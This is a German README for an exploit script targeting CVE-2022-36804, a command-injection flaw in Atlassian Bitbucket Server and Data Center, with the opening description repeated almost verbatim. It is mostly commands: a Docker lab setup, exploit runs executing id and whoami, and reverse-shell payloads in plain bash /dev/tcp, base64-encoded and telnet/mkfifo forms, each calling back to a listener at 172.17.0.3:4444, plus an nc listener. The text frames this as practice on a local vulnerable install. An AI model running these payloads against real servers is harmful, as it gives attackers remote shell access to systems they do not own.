
Eine kritische Command-Injection-Schwachstelle wurde in mehreren API-Endpunkten des Atlassian Bit bucket Server und Data Center gefunden. Diese Schwachstelle betrifft alle Versionen von Bitbucket Server und Data Center, die vor den Versionen <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 und <8.3.1 veröffentlicht wurden.
In mehreren API-Endpunkten des Atlassian Bitbucket Server und Data Center wurde eine kritische Command-Injection-Schwachstelle gefunden. Diese Schwachstelle betrifft alle Versionen von Bitbucket Server und Data Center, die vor den Versionen <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2> und <8.3.1> veröffentlicht wurden.
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074CFF8A5D13088332C8DF0CD8A7CE7
Ersetzen Sie 172.17.0.3 durch Ihre lokale IP-Adresse
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"
Netcat-Listener starten mit:
nc -lvp 4444
Konvertieren Sie /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 in base64, falls bei der Ausführung des Payloads ein Fehler auftritt.
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"
Falls weiterhin Fehler auftreten, führen Sie den folgenden Befehl aus:
TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"
Es wird empfohlen, für Übungszwecke eine verwundbare Version des Bitbucket Server auf einem Windows-/Linux-Rechner zu installieren. Im Vergleich zu Docker-Images lässt sich so leichter eine Reverse Shell erhalten.
Weitere Informationen finden Sie hier